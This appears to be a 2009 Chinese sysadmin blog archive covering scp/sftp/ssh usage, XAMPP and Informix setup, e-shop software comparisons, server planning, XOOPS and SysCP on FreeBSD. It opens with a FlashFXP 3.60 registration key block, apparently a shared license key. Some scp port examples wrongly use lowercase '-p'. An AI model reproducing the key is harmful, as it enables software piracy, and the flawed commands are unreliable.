5K8ZbQ+1X1UELaH6s000UvFUovZA
KMdDSR/u0P67MAEwhT1np4pYawRE
Coa3nx14AhwELLYuwUsfZ2fquo/j
F1RFJyEUmWPHwsIzd59maJmEa+He
Ox4C2q/wc6+EJu2GuNKNgH1N19CZ
5bDqOfafb2HeoJTb

7、flashfxp3.60注册码：
——– FlashFXP Registration Data START ——–
FLASHFXPyAB13liOyAAAAAC1W5MNJwXnsl8Es2S5kKnASZdi0K
jW5M4K8YjULRYAABnecXSKkILeqdd19oQHz6gg71ef4e5Osvnd
1BJEes1XYIGvBzwCATXp7f8a0hBtoO+iqA2GvsaBx6qWn+FhJo
W8Y53fzEuAluTxQ8OCmBByR8kyFehVhq8qXY7q4vjJuZhN/Nid
cWI/pt8e5JY1iCByNN1nemGwQ67Ss2RqZoyzPpG6aSBZYumopz
L/R8fs
——– FlashFXP Registration Data END ——–

8、

SSH工具SCP使用示例详细解析

admin — Sat, 01 Aug 2009 06:26:10 +0000

linux下如何使用sftp命令。

sftp 是一个交互式文件传输程式。它类似于 ftp, 但它进行加密传输，比FTP有更高的安全性。下边就简单介绍一下如何远程连接主机，进行文件的上传和下载，以及一些相关操作。

举例，如远程主机的 IP 是 202.206.64.33或者是域名www.hebust.edu.cn,用户名是 fyt ,在命令行模式下:sftp fyt@202.206.64.33或者 fyt@www.hebust.edu.cn。回车提示输入密码。进入提示符

sftp>

如果登陆远程机器不是为了上传下载文件，而是要修改远程主机上的某些文件。可以

ssh fyt@202.206.64.33 （其实sftp就是ssh 的一个程式。）

sftp> get /var/www/fuyatao/index.php /home/fuyatao/
这条语句将从远程主机的 /var/www/fuyatao/目录下将 index.php 下载到本地 /home/fuyatao/目录下。

sftp> put /home/fuyatao/downloads/Linuxgl.pdf /var/www/fuyatao/
这条语句将把本地 /home/fuyatao/downloads/目录下的 linuxgl.pdf文件上传至远程主机/var/www/fuyatao/ 目录下。

你如果不知道远程主机的目录是什么样， pwd命令可以帮您查询远程主机的当前路径。查询本机当前工作目录 lpwd.

SSH工具SCP使用示例详细解析

SSH（Secure Shell）是用来登录远程计算机和在远程计算机上执行命令的程序。它是用来替代rlogin和rsh，以及在不安全的网络环境下在两台计算机之间提供安全和加密的信息交流。X11连接和TCP/IP端口可以被转发到一个安全的通道里。

　　用下面的命令，登录远程计算机：

[root@deep]# SSH
例如：
[root@deep]# SSH username www.openarch.com
username@deep.openarch.com’s password:
Last login: Tue Oct 19 1999 18:13:00 -0400 from gate.openarch.com
Welcome to www.openarch.com on Deepforest.
是用来登录ssh服务器的用户名，是ssh服务器主机的地址。
scp
可以用这个命令把文件从本地计算机拷贝到远程计算机，
或者反之，甚至可以在两台远程计算机之间用“scp”命令拷贝文件。
把远程主机上的文件拷贝到当前目录的一个简单的方法如下。
用下面的命令把文件从远程主机拷贝到本地主机上：
[root@deep /]# su admin
[admin@deep /]$ scp -rp :/dir/for/file localdir/to/filelocation
例如：
[username@deep]$ scp -p username@mail:/etc/test1 /tmp
Enter passphrase for RSA key ‘username@mail.openarch.com’:
test1 | 2 KB | 2.0 kB/s | ETA: 00:00:00 | 100%
用下面的命令把文件从本地主机拷贝到远程主机上：
[root@deep /]# su admin
[admin@deep /]$ scp -p localdir/to/filelocation :/dir/for/file
例如：
[username@deep]$ scp -p /usr/bin/test2 username@mail:/var/tmp
username@mail’s password:
test2 | 7 KB | 7.9 kB/s | ETA: 00:00:00 | 100%
　　注意：“-p”选项表示文件的改变和访问时间属性以及权限，在拷贝过程中被保留。通常是需要这样的。

copy 本地的档案到远程的机器上
scp /etc/lilo.conf k@net67.ee.oit.edu.tw:/home/k
会将本地的 /etc/lilo.conf 这个档案 copy 到 net67.ee.oit.edu.tw，使用者 k 的家目录下。
copy远程机器上的档案到本地来
scp k@net67.ee.oit.edu.tw:/etc/lilo.conf /etc
会将 net67.ee.oitdu.tw 中 /etc/lilo.conf 档案 copy 到本地的 /etc 目录下。
保持从来源 host 档案的属性
scp –p k@net67.ee.tw:/etc/lilo.conf /etc

如果想使用特定端口使用 scp –p（大写）如 scp –p 1234 k@net67.ee.tw:/etc/lilo.conf /etc

在此必须注意使用者的权限是否可读取远程上的档案，若想知道更多关于 scp 的使用方法，可去看看 scp 的使用手册。
ssh-keygen
产生公开钥 (pulib key) 和私人钥 (private key)，以保障 ssh 联机的安性，当 ssh 连 shd 服务器，会交换公开钥上，系统会检查 /etc/ssh_know_hosts 内储存的 key，如果找到客户端就用这个 key 产生一个随机产生的session key 传给服务器，两端都用这个 key 来继续完成 ssh 剩下来的阶段。

它会产生 identity.pub、identity 两个档案，私人钥存放于identity，公开钥存放于 identity.pub 中，接下来使用 scp 将 identity.pub copy 到远程机器的家目录下.ssh下的authorized_keys。 .ssh/authorized_keys(这个 authorized_keys 档案相当于协议的 rhosts 档案)，之后使用者能够不用密码去登入。RSA的认证绝对是比 rhosts 认证更来的安全可靠。
执行：
scp identity.pub k@linux1.ee.oit.edu.tw:.ssh/authorized_keys

若在使用 ssh-keygen 产生钥匙对时没有输入密码，则如上所示不需输入密码即可从 net67.ee.oit.edu.tw 去登入 linux1.ee.oit.edu.tw。在此，这里输入的密码可以跟帐号的密码不同，也可以不输入密码。

linux 用scp 来迁移数据，另附Linux scp 使用详解

admin — Fri, 31 Jul 2009 01:11:12 +0000

一般情况，本地网络跟远程网络进行数据交抱，或者数据迁移，常用的有三种方法，一是ftp,二是wget /fetch 三是，rsync 大型数据迁移用rysync，其次用fetch/wget ，最次是ftp，最慢是ftp.这几天，在忙数据迁移时，用到ssh的scp方法来迁移数据。速度与效果都很好。特别是现在许多服务器为了安全，都会改ssh默认的22端口，改成一个特殊的端口。所以。在scp或者sftp时，就要指定通过什么端口来迁移。现在，特记下这个特殊端口来scp的命令。

scp -p port user@serverip:/home/user/filename /home/user/filename

以上端口p 为参数，port 端口 user 为ssh user serverip 为远程服务器ip或者域名 ,/home/user/filename 为远程服务器的文件名 /home/user/filename 为本地服务服务器的文件名。该命令的作用就是将远程的filename复制到本地对应的目录下面。

scp 的作用真的很巨大，详细用法，可以man scp 或者 scp –help ，下面为附上一篇 scp 使用详解。。。
linux 的 scp 命令可以在 linux 之间复制文件和目录；

==================
scp 命令
==================
scp 可以在 2个 linux 主机间复制文件；

命令基本格式：
scp [可选参数] file_source file_target

======
从本地复制到远程
======
* 复制文件：
* 命令格式：
scp local_file remote_username@remote_ip:remote_folder
或者
scp local_file remote_username@remote_ip:remote_file
或者
scp local_file remote_ip:remote_folder
或者
scp local_file remote_ip:remote_file

第1,2个指定了用户名，命令执行后需要再输入密码，第1个仅指定了远程的目录，文件名字不变，第2个指定了文件名；
第3,4个没有指定用户名，命令执行后需要输入用户名和密码，第3个仅指定了远程的目录，文件名字不变，第4个指定了文件名；
* 例程：
scp /home/space/music/1.mp3 root@www.cumt.edu.cn:/home/root/others/music
scp /home/space/music/1.mp3 root@www.cumt.edu.cn:/home/root/others/music/002.mp3
scp /home/space/music/1.mp3 www.cumt.edu.cn:/home/root/others/music
scp /home/space/music/1.mp3 www.cumt.edu.cn:/home/root/others/music/002.mp3

* 复制目录：
* 命令格式：
scp -r local_folder remote_username@remote_ip:remote_folder
或者
scp -r local_folder remote_ip:remote_folder

第1个指定了用户名，命令执行后需要再输入密码；
第2个没有指定用户名，命令执行后需要输入用户名和密码；
* 例程：
scp -r /home/space/music/ root@www.cumt.edu.cn:/home/root/others/
scp -r /home/space/music/ www.cumt.edu.cn:/home/root/others/

上面命令将本地 music 目录复制到远程 others 目录下，即复制后有远程有 ../others/music/ 目录

======
从远程复制到本地
======
从远程复制到本地，只要将从本地复制到远程的命令的后2个参数调换顺序即可；

例如：
scp root@www.cumt.edu.cn:/home/root/others/music /home/space/music/i.mp3
scp -r www.cumt.edu.cn:/home/root/others/ /home/space/music/

配置Linux+Apache+PHP+Informix

admin — Mon, 20 Jul 2009 14:43:57 +0000

1.配置Apache+PHP
Apache与PHP配置可以使用一套集成环境XAMPP，可以免去编译配置的繁琐工作。
>下载XAMPP的以及对应的开发包
1）xampp-linux-1.7.2.tar.gz
2）xampp-linux-devel-1.7.2.tar.gz
>安装Lampp
使用root用户

tar xvfz xampp-linux-1.7.2.tar.gz -C /opt
tar xvfz xampp-linux-devel-1.7.2.tar.gz -C /opt

即将lampp安装到/opt/目录下

2.Informix & CSDK
Informix的安装在这里不做过多说明，需要注意的是PHP连接Informix需要CSDK 2.81以上版本的支持，CSDK安装到$INFORMIXDIR。
如果php访问远端Informix server，还需要在php所属服务器上安装unixODBC

3.配置PDO_INFORMIX模块
由于我们使用的LAMPP集成环境，所以PHP是已经编译好的，这时需要增加PHP的扩展pdo_informix.so就要用到phpize预编译工具。
>phpize
需要autoconf支持，下载pdo_informix安装包PDO_INFORMIX-1.2.6.tgz
使用root用户：
解开安装包
tar xvfz PDO_INFORMIX-1.2.6.tgz
进入安装包目录
cd PDO_INFORMIX-1.2.6
运行phpize工具

/opt/lamp/bin/phpize
./configure -–with-php-config=/opt/lamp/bin/php-config

如果提示–with-pdo-informix=dir，则需要先加载informix环境变量

多款国外开源网店系统的功能对比与分析

admin — Mon, 06 Jul 2009 15:38:58 +0000

多款PHP开源网店系统的介绍

看完下面这篇文章后，俺终于决定用zencart中文版来代替俺之前用ecshop2.60搭建的网店。。

对于开源的系统最大的优点当然是免费，而且可以根据自己的需要选择插件，以适应自己的需要。但有一个前提，目前国内很多年谓开源的商城系统其实是要收费。其中都有一个条款就是大意是不能用于商业用途，作为电子商务软件不用于商业用途又能有什么用？真的用来学习编程吗？但国外的这几款开源的网店系统却真的是免费的，可以用于建设你的独立网店而无需付费。

以下是对多款开源网店的性能与各种参数进行一系列的对比，希望各位从中可以选出适合自己的网店系统。ECShop作为国内商城系统的代表也列入其中以作比较。(以下表格内容来源自网络收集)

从各软件特性分析

（中文语言、授权方式、系统功能、搜索引擎、模板、用户数量)

软件名称

Magento

ECShop

osCommerce

Zen Cart

Freeway

中文语言

支持繁体中文

支持

不支持

授权方式

OPL 协议免费

GPL 协议付费

GPL 协议免费

系统性能

速度中等

速度快

搜索引擎

优

中

弱

模版

模板数量多

界面颜色丰富

模板数量多

界面颜色丰富

模块数量中等

界面颜色丰富

模块数量中等

界面颜色丰富

模板数量偏少

界面颜色较少

用户数量

国内中等

国外最多

国内最多

国外少

国内中等

国外较多

国内较少

国外最多

国内少

国外较多

从各软件功能分析

（购物车、商品管理、商品属性、订单处理、促销、支付接口、运输、报表统计、广告管理、CMS）

功能
magento
Ecshop
Oscommerce
Zen cart
Freeway

购物车

可不注册会员购买

必须注册会员才可购买

可不注册会员购买

商品管理

商品评论、

属性控制、

标签管理、

商品库存、

商品图片、

制造厂商、商品评论、

特价商品、商品预告、

商品回收站、商品批量上传修改

生成商品代码、比商品自动上下架

标签管理、图片批量处理等、

制造厂商

商品评论

特价商品

商品预告

商品分类

商品分类、商品类型、价格管理

选项名称、选项内容、属性控制

下载管理、厂商管理、评论管理

特价商品、推荐管理、促销商品

即将上市商品、快速更新等、

商品类型、价格管理、

选项名称、厂商管理、

商品评论

商品属性

商品类型、属性分组，

商品排序

商品类型、属性分组

属性值的录入方式、可选值列表

商品排序

商品类型、

属性分组、

商品类型、属性分组，

属性值的录入方式、

可选值列表、商品排序

商品类型、

属性分类（如：厂商）

订单处理

订单列表、订单查询、

合并订单、添加订单、

订单列表、订单查询、

合并订单、订单打印

缺货登记、添加订单、

订单查询

缺货登记

添加订单等

订单查询、合并订单、

订单打印、添加订单、等

订单查询、订单打印、

添加订单、等

促销

优惠券、

商品价格优惠百分比、

固定金额优惠、

整个购物车固定金额优惠

夺宝奇兵、红包类型

商品包装、祝福贺卡、

团购活动、专题管理、

拍卖活动、优惠活动、等

按订购总额折扣优惠、

按具体产品订购量折扣优惠

优惠券、

优惠活动（特价商品）

免费赠品、批量优惠、

暂无

支付接口

（都添加插件，自选支付接口）

Paypal 贝宝、

支付宝、网银在线等多种支付方式

Paypal 贝宝、

网银在线、支付宝、

QQ 财富通等十多种支付网关

环迅 IPS 、收汇Ctopay

网银在线、 NPS 支付

支付宝等

支付宝、快钱、网银在线、

贝宝、 iePay 、 NPS 、

环讯 IPS 、电信支付、首信

iePay 、网银在线、

等多种支付方式

运输

快递（ UPS ）、

平邮、 EMS 、

上门取货、 EMS 、

平邮、运费到付、

邮政挂号印刷品

快递、平邮、

EMS 、等

快递、平邮、（联合邮政 UPS 、美国邮政 UPS 、） EMS

快递、平邮、 EMS 、等

报表

( 统计 )

销售统计、

客户统计、

搜索引擎、

流量统计

评论统计

流量分析、客户统计、

销售统计、会员排行统计、

搜索引擎、销售排行统计、

搜索引擎、站外投放 JS

流量分析、客户统计

销售统计

客户购买排行榜

访问统计、销售统计、

订单统计、商品库存、

客户推荐、销售分析、

待付订单、现金统计、

访问统计、

订单统计、

客户统计、

销售统计

广告管理

无

广告列表、广告位置

显示广告，广告横幅

广告组别、广告排序、广告显示状态、

无

CMS

(内容管理系统)

支持

不支持

支持

GNU自由文档许可证（GNU Free Documentation License）是一个版权所无（或称“反版权”）的内容开放的版权协议。

File/pdc/samba文件打印共享服务器建设方案.

admin — Mon, 06 Jul 2009 14:43:34 +0000

建立文件共享 / 打印系统：不得不重视的简单

说起建立一个文件共享 / 打印系统，很多企业反应的是简单，但对于一个企业来说，无论大小与难易，都是不容忽视的。还是先来看看打印的应用吧，在公司内部，无论是销售人员的产品销售配置清单，或者技术人员的设计样图等资料都需要经常的通过打印机打印出来并存档备查，并且当前的商务往来信函也全部采用打印体以避免误会的产生。但是每个员工配备一个打印机显然是不可能的，那么唯一的解决方法就是配置一台共享的打印机供员工们在需要的时候方便的通过网络使用。

在当前瞬息万变的商业环境中，信息的共享是提高员工工作效率，增加决策准确度和通过协作完成复杂工作的不二法门。有个承接国外客户广告设计的企业在使用了这种文件共享服务器后，工作效率得到了极大的提升。以前国外客户需要提供产品设计图给该公司时，常会遇到这样的状况：当档案太大无法用 email 寄送，选择使用快递通常还是得花上 3 天以上才够！公司收到后又需要 2 天以上的时间修改与确认，再额外地使用 2 天将定案的设计图快递给下游工厂生产，前前后后最快也要花上 8 天的时间！要是哪个环节不顺利可能还要更久。

所谓时间就是金钱，究竟要怎么样改善呢 ? 采用远程文件共享服务器之后，国外客户将生产设计图 (500MB) 上传至文件共享服务器（节省 3 天的快递时间）；员工直接在文件共享服务器上修改并与客户确认设计图，并将最后版本的设计图放在文件共享服务器上让合作的工厂直接下载（ 2 天的作业时间）；大陆的工厂直接从文件共享服务器下载设计图进行生产（节省 3 天的快递时间）。从这个案例，我们就能发现使用文件共享服务器可以为公司节省 6 天的时间，以及快递费用，变相的创造了大量的经济效益。当然了，文件共享服务还有许多其他重要的应用，比如，要求所有员工需要定时将自己的工作文档备份到文件服务器上，这样就避免了员工电脑崩溃所带来的数据损失，以及克服了员工离职时所带来的交接困难。

如果单独为打印设置一台共享服务器显得过于浪费，因此可以将打印与文件共享结合在一台服务器上提供服务。

选择真正的服务器只需一个理由：满足你的需求

现在有很多的中小企业都使用高端 PC 机来作为打印共享使用，虽然 PC 机能够满足打印共享对于性能的要求，但是像打印共享这类简单的应用完全可以与远程文件共享一类的应用同时利用一台专用服务器提供服务，也就是合并应用，提高机器利用率。但是这样一来，普通 PC 就无法满足应用要求。

首先，我们的远程文件共享系统需要 24 小时提供服务，因为出差在外的员工可能随时随地的需要文件服务器上的数据来开展工作，还有远在海外的供货商也需要这个系统来共享一些大文件数据；而 PC 并不是按照 24 小时工作设计的，如果强行让其 24 小时工作，这台 PC 就可能因为常时间的不间断使用而发生故障，从而造成工作的延误，甚至出现硬盘故障导致数据损失，就更加无法估量这个损失了。而服务器所专用的 24 小时工作设计，冗余部件等等技术都保证了服务器能够不停息的工作。

另外 PC 在磁盘的扩展性以及数据传输的可靠性方面都不如真正的服务器，所以在涉及这些关键数据的应用领域还是选择服务器为妙。

接下来要做的，只需选择

其实选择的方式有很多，可以根据预算的多少来进行选择，也可以根据应用环境的复杂程度来选择，还可以根据你想拥有的某些特殊功能来进行选择。

如果您的公司或者部门拥有的 PC 数量在 100 台以下；那么在文件共享服务器上的并发量一般不会超过 10 ，使用一台带 Linux/Unix 操作系统的服务器即可满足要求。配置一颗支持扩展 64 位内存寻址技术的 Pentium4 处理器或者 Xeon 处理器，另外 OS 一般会消耗掉 256MB 以上内存，所以最低要求配到 512MB ECC DDRII 双路交叉存取内存。而磁盘方面对于高速存取没有什么特别的要求，主要从经济角度考虑，可以使用 SATA 硬盘，在预算充足的情况下考虑使用 SCSI 硬盘，容量方面一般保证 200 个 GB 即够用了，如果考虑到数据的安全保护方面，还需要考虑使用 RAID 卡或者集成 RAID 进行数据保护。

P4 3.0GHz( 或者 Xeon 2.8GHz EM64T) /512MB ECC DDRII SDRAM /2×120GB SATA( 或者热插拔 SCSI 硬盘 ) / 集成 SATA RAID / 1000M 服务器专用网卡 / 单电源
如果您的预算在 1 万以下；那么简单的配置就可以是：
P4 3.0GHz /512MB ECC DDRII SDRAM /2×80GB SATA 硬盘 / 集成 SATA RAID1 / 1000M + 100M 服务器专用网卡 / 单电源
如果您的预算在 1 万～ 2 万之间；可以配置 Xeon 处理器和 SCSI 磁盘的服务器：
Xeon 2.8GHz EM64T /512MB( 或者 1GB) ECC DDRII SDRAM /2×73GB 热插拔 SCSI 硬盘 /SCSI RAID1 / 1000M 服务器专用网卡 / 单电源

怎么做，你决定
从以上简单的分析不难看出，打印 / 文件共享系统虽然简单，但却是每一个企业正常运营的基础，而使用真正的服务器是进行文件 / 打印应用的坚实保障。它提供给我们的稳定和安全无疑让每一个心怀大志的企业领导者从无限琐碎且不必要的烦恼摆脱出来，以更充沛的精力去为企业发展开拓新的道路。

mail 邮件服务器建设方案.

admin — Mon, 06 Jul 2009 14:39:15 +0000

mail 邮件服务器建设方案.

在中国为数众多的中小企业中，由于存在资金、人才、管理水平等瓶颈问题，全面实施信息化工程的企业比例较低。在信息系统的整体投入一般在百万元以下，当前建设主要集中在财务管理、电子邮件以及少量的ERP系统等方面。
而在信息系统的管理方面，中小企业由于缺少专业的技术人员，必然要求信息系统的核心–服务器系统，有很高的要求:便于管理和维护，能够远程操作等。那么如何选择一套满意的服务器系统，需要注意哪些方面的问题，成为中小企业用户目前迫切需要了解的瓶颈。

　　据统计，中小企业是双路服务器的主要市场。这类用户是当前中国经济中非常活跃的一部分，他们的数据应用是随着他们业务的增长而不断增长的，这就要求所选配的服务器具备弹性部署的能力，能够随应用的增长而有较大空间提升性能。由于中小企业受投资预算所限，一般采用2～3台服务器运行多个应用。虽然中小企业的应用多种多样，但是这多种应用的核心关注点归纳起来主要有以下方面。

　　首先是服务器的数据处理能力:在信息系统中，作为核心单元的服务器系统面临着各种数据采集、处理、传输等数据密集型操作。服务器系统强大的数据处理能力和数据吞吐能力是企业信息系统高效率运行的保障。这类应用一般常见于企业的网站、办公自动化系统和后台数据库的应用。

　　其次是服务器系统的可扩展性: 中小企业是一个不断成长、应用不断变化的经济个体。采购的服务器不光要满足当前的应用，还要能随着企业应用的变化而一同扩展、升级。这就要求服务器具备较大的扩展空间。

　　第三是服务器系统的可管理性:在中小企业应用中由于专业技术人员缺乏，承载着多种应用的服务器系统必须便于管理，运行稳定可靠。

　　第四是厂商的服务能力和信誉:中小企业需要将精力集中到主营业务上来，而信息系统的安全运行及售后保障需要厂家具备极强的售后服务能力和售前、售中的咨询服务能力。

　　解决方案

　　E-Mail服务器上运行着邮件服务软件，用户使用的电子邮箱就是建立在邮件服务器上。借助它提供的服务，建立企业内部邮件系统，辅助企业专业应用系统和OA系统，实现企业各级工作人员之间的沟通、交流、协作，以及与外界联络等。

　　目前，主流的电子邮件服务主要还是基于纯文本和HTML格式的邮件文件的存储和转发，但是随着邮件服务软件的功能扩展和某些工作对多媒体信息的渴求，邮件中开始携带越来越多的音视频数据信息，不但增大了邮件文件，还增加了邮件服务软件处理它们时的CPU资源开销

功能强大的CMS–XOOPS简介与评述.

admin — Fri, 19 Jun 2009 04:52:32 +0000

笔者注：
前段时间，用xoops来建了一个男士网，网址为：http://www.hunttech.com.cn ，是使用xoops来建，在建设的过程，由对xoops的一无所知，到男士网建成后，对XOOPS的有所熟悉。个人认为。xoops真的一个很好的，定制性很强的cms系统。值得一用。下面，是俺从网上找的关于cms-xoops 的一些简介与详述。有兴趣者，可以到相关网站认真阅读。

利用 PHP＋MySQL 编写的面向对象的可扩展智能建站门户系统:
XOOPS 作为开源社区一个优秀的内容管理系统，自它面世起就一直受到人们的关注。其主要特征包括系统功能模块化，界面设计模板化，安装使用管理简洁明了，功能完善。
相对于其他 CMS，XOOPS 有完善的权限管理，可以对不同用户群组赋予不同的使用或管理权限。XOOPS 代码规范，注重安全性，极少被发现有安全漏洞；结构设计合理，易于作二次开发。作为理想的开发系统，被广泛用于个人网站、社区交流、公司企业以及各类大型门户系统。
XOOPS 社区开发活跃，各类功能模块可有不同选择，包括：新闻发布系统、文章管理、论坛、相册、资源下载、友情链接、广告/黄页管理、在线购物等传统模块，近来并有各种新型类别如 BLOG、WIKI、RSS 在线阅读/采集等。
作为一个功能强大的 CMS 系统，得益于其结构设计合理，XOOPS 除了本身的各类功能模块之外，可以很方便的集成现有的软件，比著名的 BLOG 程序 WORDPRESS、购物系统 OSCOMMERCE/ZEN-CART、图片管理程序 GALLERY等已经被集成到 XOOPS 中。

XOOPS 的发布按照 GPL (GNU General Public License) 协议，在遵守GPL条款的前提下可以在任何场合免费使用和修改。

英文官方网站：http://www.xoops.org
中文官方网站：http://xoops.org.cn
英文开发网站：http://dev.xoops.org
中文开发网站：http://dev.xoops.org.cn

XOOPS 的发展:
XOOPS 源自于PHPNUKE/MYPHPNUKE，2002年１月发布1.0 RC，从2.0开始采用 SMARTY模板。

XOOPS开发者主要来自原来的PHPNUKE社区，主要的创始者:
Kazumi Ono (onokazu) http://www.myweb.ne.jp http://www.xoops.org http://jp.xoops.org
Goghs Cheng (goghs) http://www.eqiao.com http://www.bizbeez.com
自从2004年初开始，XOOPS的开发更加活跃，核心程序的开发在SourceForge.NET，模块开发主要集中于 XOOPS DEV FORGE．另有大大小小不计其数的开发团队或个人，比较著名的有日本XOOPS社区(特别是一些安全专家也一直参与XOOPS的开发和改进)，WF-PROJECTS，以及Predator的开发团队等．

XOOPS由于界面设计的局限性，模板风格一致不如人意，但是漂亮的主题风格依然层出不穷．比较著名的设计团队有maclinks, 7dana, aston, incama以及日本的设计人员．

XOOPS 示例
XOOPS 能实现什么功能，做什么样的网站？

这是每个新用户在开始接触XOOPS时的第一个问题．这里列出几个实例，希望能有所启发

中文网站:

国外网站:
Mobile Marketing Association: http://mmaglobal.com
Novell Forge 开发站：http://forge.novell.com
The Fantasy Asylum site：http://www.fantasyasylum.com
fyn.dk：http://www.fyn.dk
NABUUR Foundation：http://www.nabuur.com

XOOPS 系统需求:
HTTP服务器：APACHE或IIS (XOOPS推荐使用APACHE，对IIS不做保证)
PHP 4.10以上，推荐4.11以上；从XOOPS 2.09开始支持 PHP 5.x
数据库：MySQL 3.23 以上
其它推荐设置 GD2.+或ImageMagicK，XML，MB 多字节扩展支持，CURL等

XOOPS 支持:
如果您的英语读写能力可以，可以经常访问XOOPS英文官方站．特别是如果对XOOPS开发的进展比较感兴趣，您可以访问这几个站点
XOOPS DEV FORGE: http://dev.xoops.org
XOOPS FORGE: http://sourceforge.net/projects/xoops
XOOPS CVS: http://cvs.sourceforge.net/viewcvs.py/xoops
如果您在XOOPS的安装或使用过程中遇到什么问题，可以在XOOPS CHINA文档中心查找相关资料并在技术论坛向支持团队或其他

XOOPS用户提出您的问题:
请尽量不要直接跟支持团队成员联系，尽可能在论坛交流，一来可以避免对团队成员的过多干扰，二来通过您与其他用户的问答，可以将自己的经验或教训与XOOPS社区共享

XOOPS 下载:
XOOPS CHINA下载中心提供当前最新的XOOPS程序汉化和大部分XOOPS模块的汉化和修正以及主题风格．

分类：

XOOPS核心代码：提供XOOPS核心程序的汉化及HACK
推荐模块：经过XOOPS CHINA支持团队基本核实的模块，一般BUG和安全漏洞比较少
XOOPS模块：XOOPS用户开发或汉化的模块
XOOPS 电子商务模块:XOSC、XZC、XTC 购物模块及相关功能扩展模块
XOOPS风格模板：可在　http://dev.xoops.org.cn 看到演示
期待着您把自己开发或汉化的模块和设计的XOOPS模板提交到下载中心：http://xoops.org.cn/modules/wfdownloads

XOOPS 文档:
经过XOOPS CHINA支持团队和热心用户的工作，目前有 XOOPS 中文文档：
XOOPS 入门
XOOPS 简介
XOOPS 操作指南
XOOPS 进展
通过XOOPS CHINA新闻中心，您可以了解到XOOPS最新开发进展和社区动态．在XOOPS china (http://xoops.org.cn)，您可以注册并与中文开发者交流，了解中文社区的开发，并提供您的建议．

如果您不能经常访问XOOPS CHINA，您可以使用XMLine这个模块远程阅读XOOPS聚合新闻：
XOOPS CHINA 新闻：http://xoops.org.cn/backend.php
论坛最新讨论：http://xoops.org.cn/modules/newbb/rss.php
XOOPS BLOG: http://xoops.org.cn/modules/wordpress/wp-rss.php
XOOPS CHINA 介绍
XOOPS CHINA 为 XOOPS 官方中文站，提供 XOOPS 安装、使用和开发的各项技术支持．

技术支持:
XOOPS 作为开源社区的一员，取之于众，报之于众．我们真诚希望能一如既往得到各界的支持和帮助．
XOOPS 社区一直寻求熟悉或精通PHP/MySQL或LINUX的朋友对XOOPS开发提供您的建议或咨询，特别希望安全界高手能够帮助我们检查修正XOOPS存在的安全问题，并诚挚的欢迎你加入XOOPS CHINA团队.

FreeBSD下安装SysCP主机管理系统

admin — Fri, 19 Jun 2009 04:45:11 +0000

实施环境：FreeBSD 7 Beta 1.5 AMD64位，CD光盘。采用Mini安装，允许SSH。

1、添加FreeBSD的Ports包更新工具CVSUP
pkg_add -r cvsup-without-gui

2、添加FreeBSD的bash
pkg_add -r bash

3、修改以下文件的CHANGE_THIS.FREEBSD.ORG为cvsup.freebsdchina.org（位于第49行）
/usr/share/examples/cvsup/ports-supfile
/usr/share/examples/cvsup/www-supfile
/usr/share/examples/cvsup/stable-supfile

4、重启后更新系统
cvsup -g -L 2 /usr/share/examples/cvsup/ports-supfile
cvsup -g -L 2 /usr/share/examples/cvsup/www-supfile
cvsup -g -L 2 /usr/share/examples/cvsup/stable-supfile

5、开始安装SYSCP
cd /usr/ports/sysutils/syscp
make all install clean

对话框Options for apache 2.2.6_2
[X] MYSQL Enable MySQL support for apr-dbd
[X] AUTH_BASIC Enable mod_auth_basic
[X] AUTH_DIGEST Enable mod_auth_digest
[X] AUTHN_FILE Enable mod_authn_file
[X] AUTHN_DBD Enable mod_authn_dbd
[X] AUTHN_DBM Enable mod_authn_dbm
[X] AUTHN_ANON Enable mod_authn_anon
[X] AUTHN_DEFAULT Enable mod_authn_default
[X] AUTHN_ALIAS Enable mod_authn_alias
[X] AUTHZ_HOST Enable mod_authz_host
[X] AUTHZ_GROUPFILE Enable mod_authz_groupfile
[X] AUTHZ_USER Enable mod_authz_user
[X] AUTHZ_DBM Enable mod_authz_dbm
[X] AUTHZ_OWNER Enable mod_authz_owner
[X] AUTHZ_DEFAULT Enable mod_authz_default
[X] CACHE Enable mod_cache
[X] DISK_CACHE Enable mod_disk_cache
[X] FILE_CACHE Enable mod_file_cache
[X] DAV Enable mod_dav
[X] DAV_FS Enable mod_dav_fs
[X] ACTIONS Enable mod_actions
[X] ALIAS Enable mod_alias
[X] ASIS Enable mod_asis
[X] AUTOINDEX Enable mod_autoindex
[X] CERN_META Enable mod_cern_meta
[X] CGI Enable mod_cgi
[X] CHARSET_LITE Enable mod_charset_lite
[X] DBD Enable mod_dbd
[X] DEFLATE Enable mod_deflate
[X] DIR Enable mod_dir
[X] DUMPIO Enable mod_dumpio
[X] ENV Enable mod_env
[X] EXPIRES Enable mod_expires
[X] HEADERS Enable mod_headers
[X] IMAGEMAP Enable mod_imagemapx
[X] INCLUDE Enable mod_include
[X] INFO Enable mod_info
[X] LOG_CONFIG Enable mod_log_config
[X] LOGIO Enable mod_logio
[X] MIME Enable mod_mime
[X] MIME_MAGIC Enable mod_mime_magic
[X] NEGOTIATION Enable mod_negotiation
[X] REWRITE Enable mod_rewrite
[X] SETENVIF Enable mod_setenvif
[X] SPELING Enable mod_speling
[X] STATUS Enable mod_status
[X] UNIQUE_ID Enable mod_unique_id
[X] USERDIR Enable mod_userdir
[X] USERTRACK Enable mod_usertrack
[X] VHOST_ALIAS Enable mod_vhost_alias
[X] FILTER Enable mod_filter
[X] VERSION Enable mod_version
[X] SSL Enable mod_ss

对话框Options for dovecot 1.0.7选择
[X] KQUEUE kqueue(2) support
[X] SSL SSL support
[X] IPV6 IPv6 support
[X] POP3 POP3 support
[X] LDA LDA support
[X] MYSQL MySQL support
[X] SQLITE SQLite support

对话框Options for postfix 2.4.6,1，选择
[X] PCRE Perl Compatible Regular Expressions
[X] DOVECOT Dovecot SASL authentication method
[X] BDB Berkeley DB (choose version with WITH_BDB_VER)
[X] MYSQL MySQL maps (choose version with WITH_MYSQL_VER)
[X] VDA VDA (Virtual Delivery Agent)

You need user “postfix” added to group “mail”.
Would you like me to add it [y]? Y

Would you like to activate Postfix in /etc/mail/mailer.conf [n]? y

选择Options for proftpd-mysql 1.3.1_1
[X] MYSQL Use MySQL
[X] OPENSSL Include mod_tls
[X] QUOTA Include mod_quota
[X] IFSESSION Include mod_ifsession
[X] README Include mod_readme
[X] RATIO Include mod_ratio
[X] REWRITE Include mod_rewrite
[X] WRAP Include mod_wrap2
[X] RADIUS Include mod_radius

选项 Options for gd 2.0.35,1
[X] ICONV iconv support

对话框Options for php5 5.2.4_1
[X] CLI Build CLI version
[X] CGI Build CGI version
[X] APACHE Build Apache module
[X] SUHOSIN Enable Suhosin protection system (not for jails)
[X] MULTIBYTE Enable zend multibyte support
